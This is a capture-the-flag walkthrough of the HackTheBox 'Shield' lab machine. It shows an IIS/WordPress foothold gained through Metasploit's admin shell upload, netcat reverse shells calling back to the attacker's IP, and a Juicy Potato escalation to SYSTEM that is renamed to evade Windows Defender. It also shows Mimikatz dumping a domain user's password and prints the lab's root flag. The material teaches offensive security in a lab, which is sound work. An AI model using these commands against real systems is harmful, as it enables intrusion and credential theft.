HackTheBox-StartingPoint-Shield

From aldeid
Jump to navigation Jump to search

Shield

HTB > Starting Point > Shield

Note: this starting point machine only features a root.txt

Enumeration

Nmap

We begin by running an Nmap scan.

PORT     STATE SERVICE VERSION
80/tcp   open  http    Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
3306/tcp open  mysql   MySQL (unauthorized)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

From the Nmap output, we find that IIS and MySQL are running on their default ports. IIS (Internet Information Services) is a Web Server created by Microsoft.

Let’s navigate to port 80 using a browser.

HackTheBox-StartingPoint-Shield-web.png

We see the default IIS starting page.

GoBuster

Let’s use GoBuster to scan for any sub-directories or files that are hosted on the server.

[email protected]:/data$ gobuster dir -u http://10.10.10.29 -w /usr/share/wordlists/dirb/common.txt 
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.29
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/06/13 10:56:33 Starting gobuster
===============================================================
/wordpress (Status: 301)
===============================================================
2020/06/13 10:56:52 Finished
===============================================================

The scan reveals a folder named wordpress. Let’s navigate to it (http://10.10.10.29/wordpress).

Foothold

WordPress

WordPress is a Content Management System (CMS) that can be used to quickly create websites and blogs. Since we have already acquired the password [email protected]!, we can try to login to the WordPress site. We navigate to http://10.10.10.29/wordpress/wp-login.php and try to guess the username. Some common usernames are admin or administrator. The combination admin:[email protected]! is successful and we gain administrative access to the site.

The administrative access can be leveraged through the msfmodule exploit/unix/webapp/wp_admin_shell_upload, to get a meterpreter shell on the system.

[email protected]:/data$ msfconsole -q
msf5 > use exploit/unix/webapp/wp_admin_shell_upload
msf5 exploit(unix/webapp/wp_admin_shell_upload) > show options

Module options (exploit/unix/webapp/wp_admin_shell_upload):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD                    yes       The WordPress password to authenticate with
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The base path to the wordpress application
   USERNAME                    yes       The WordPress username to authenticate with
   VHOST                       no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   0   WordPress


msf5 exploit(unix/webapp/wp_admin_shell_upload) > set rhost 10.10.10.29
rhost => 10.10.10.29
msf5 exploit(unix/webapp/wp_admin_shell_upload) > set targeturi /wordpress
targeturi => /wordpress
msf5 exploit(unix/webapp/wp_admin_shell_upload) > set username admin
username => admin
msf5 exploit(unix/webapp/wp_admin_shell_upload) > set password [email protected]!
password => [email protected]!
msf5 exploit(unix/webapp/wp_admin_shell_upload) > run

[*] Started reverse TCP handler on 10.10.14.195:4444 
[*] Authenticating with WordPress using admin:[email protected]!...
[+] Authenticated with WordPress
[*] Preparing payload...
[*] Uploading payload...
[*] Executing the payload at /wordpress/wp-content/plugins/NvTkksXtvl/ujwUshaaSs.php...
[*] Sending stage (38288 bytes) to 10.10.10.29
[*] Meterpreter session 1 opened (10.10.14.195:4444 -> 10.10.10.29:49717) at 2020-06-13 11:20:52 +0200
[!] This exploit may require manual cleanup of 'ujwUshaaSs.php' on the target
[!] This exploit may require manual cleanup of 'NvTkksXtvl.php' on the target
[!] This exploit may require manual cleanup of '../NvTkksXtvl' on the target
[+] Deleted ujwUshaaSs.php
[+] Deleted NvTkksXtvl.php

meterpreter > 

A netcat binary is uploaded to the machine for a more stable shell.

Netcat

On your machine, download nc.exe:

[email protected]:~/Downloads$ cd ~/Downloads/
[email protected]:~/Downloads$ wget https://eternallybored.org/misc/netcat/netcat-win32-1.11.zip
[email protected]:~/Downloads$ unzip netcat-win32-1.11.zip 
[email protected]:~/Downloads$ cp netcat-1.11/nc.exe .

Now, back to the meterpreter, let’s use the following commands:

meterpreter > lcd /home/unknown/Downloads

lcd stands for “Local Change Directory”, which we use to navigate to the local folder where nc.exe is located.

meterpreter > cd C:/inetpub/wwwroot/wordpress/wp-content/uploads
meterpreter > upload nc.exe
[*] uploading  : nc.exe -> nc.exe
[*] Uploaded -1.00 B of 35.67 KiB (-0.0%): nc.exe -> nc.exe
[*] uploaded   : nc.exe -> nc.exe

We then navigate to a writeable directory on the server (in our case C:/inetpub/wwwroot/wordpress/wp-content/uploads) and upload netcat. Let’s start a netcat listener (on your machine):

[email protected]:~/Downloads$ rlwrap nc -nlvp 1234
listening on [any] 1234 ...

Next, we can execute the following command in the meterpreter session to get a netcat shell:

meterpreter > execute -f nc.exe -a "-e cmd.exe 10.10.14.195 1234"
Process 3248 created.

Privilege Escalation

Running the sysinfo command on the meterpreter session, we notice that this is a Windows Server 2016 OS, which is vulnerable to the Rotten Potato exploit.

meterpreter > sysinfo 
Computer    : SHIELD
OS          : Windows NT SHIELD 10.0 build 14393 (Windows Server 2016) i586
Meterpreter : php/windows

Juicy Potato

Juicy Potato is a variant of the exploit that allows service accounts on Windows to escalate to SYSTEM (highest privileges) by leveraging the BITS and the SeAssignPrimaryToken or SeImpersonate privilege in a MiTM attack.

We can exploit this by uploading the Juicy Potato binary and executing it.

As before, we can use our meterpreter shell to do the upload and then we can use the netcat shell to execute the exploit.

meterpreter > lcd /home/username/Downloads
meterpreter > upload JuicyPotato.exe
[*] uploading  : JuicyPotato.exe -> JuicyPotato.exe
[*] Uploaded -1.00 B of 3.76 MiB (0.0%): JuicyPotato.exe -> JuicyPotato.exe
[*] uploaded   : JuicyPotato.exe -> JuicyPotato.exe

Note: We will have to rename the Juicy Potato executable to something else, otherwise it will be picked up by Windows Defender.

meterpreter > mv JuicyPotato.exe js.exe

We can create a batch file that will be executed by the exploit, and return a SYSTEM shell. Let’s add the following contents to shell.bat (run it from the first reverse shell running on port 1234, and replace the IP with yours):

C:\inetpub\wwwroot\wordpress\wp-content\uploads>echo START C:\inetpub\wwwroot\wordpress\wp-content\uploads\nc.exe -e powershell.exe 10.10.14.195 1111 > shell.bat

Let’s start another netcat listener:

[email protected]:~/Downloads$ rlwrap nc -nlvp 1111

Next, we execute the netcat shell using the following command (from the first reverse shell running on port 1234).

C:\inetpub\wwwroot\wordpress\wp-content\uploads>js.exe -t * -p C:\inetpub\wwwroot\wordpress\wp-content\uploads\shell.bat -l 1337
js.exe -t * -p C:\inetpub\wwwroot\wordpress\wp-content\uploads\shell.bat -l 1337
Testing {4991d34b-80a1-4291-83b6-3328366b9097} 1337
......
[+] authresult 0
{4991d34b-80a1-4291-83b6-3328366b9097};NT AUTHORITY\SYSTEM

[+] CreateProcessWithTokenW OK

C:\inetpub\wwwroot\wordpress\wp-content\uploads>

Note: We can use another CLSID -c {bb6df56b-cace-11dc-9992-0019b93a3a84}, if our payload is not working.

The root flag is located in C:\Users\Administrator\Desktop.

[email protected]:~/Downloads$ rlwrap nc -nlvp 1111
listening on [any] 1111 ...
connect to [10.10.14.195] from (UNKNOWN) [10.10.10.29] 49802
Windows PowerShell 
Copyright (C) 2016 Microsoft Corporation. All rights reserved.

PS C:\Windows\system32> whoami
whoami
nt authority\system
PS C:\Windows\system32> more \users\administrator\desktop\root.txt
more \users\administrator\desktop\root.txt
6e9a9fdc6f64e410a68b847bb4b404fa

PS C:\Windows\system32> 

Root flag: 6e9a9fdc6f64e410a68b847bb4b404fa

Post Exploitation

Mimikatz can be used to dump cached passwords. From the meterpreter session:

meterpreter > upload mimikatz.exe
[*] uploading  : mimikatz.exe -> mimikatz.exe
[*] Uploaded -1.00 B of 984.76 KiB (0.0%): mimikatz.exe -> mimikatz.exe
[*] uploaded   : mimikatz.exe -> mimikatz.exe

We execute mimikatz and use the sekurlsa command to extract logon passwords:

PS C:\inetpub\wwwroot\wordpress\wp-content\uploads> ./mimikatz.exe
./mimikatz.exe

  .#####.   mimikatz 2.2.0 (x64) #19041 May 19 2020 00:48:59
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( [email protected] )
  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/

mimikatz # sekurlsa::logonpasswords

[REDACTED]

Authentication Id : 0 ; 305742 (00000000:0004aa4e)
Session           : Interactive from 1
User Name         : sandra
Domain            : MEGACORP
Logon Server      : PATHFINDER
Logon Time        : 6/13/2020 9:12:22 AM
SID               : S-1-5-21-1035856440-4137329016-3276773158-1105
    msv :   
     [00000003] Primary
     * Username : sandra
     * Domain   : MEGACORP
     * NTLM     : 29ab86c5c4d2aab957763e5c1720486d
     * SHA1     : 8bd0ccc2a23892a74dfbbbb57f0faa9721562a38
     * DPAPI    : f4c73b3f07c4f309ebf086644254bcbc
    tspkg : 
    wdigest :   
     * Username : sandra
     * Domain   : MEGACORP
     * Password : (null)
    kerberos :  
     * Username : sandra
     * Domain   : MEGACORP.LOCAL
     * Password : Password1234!
    ssp :   
    credman :   

[REDACTED]

And we find the password Password1234! for domain user Sandra.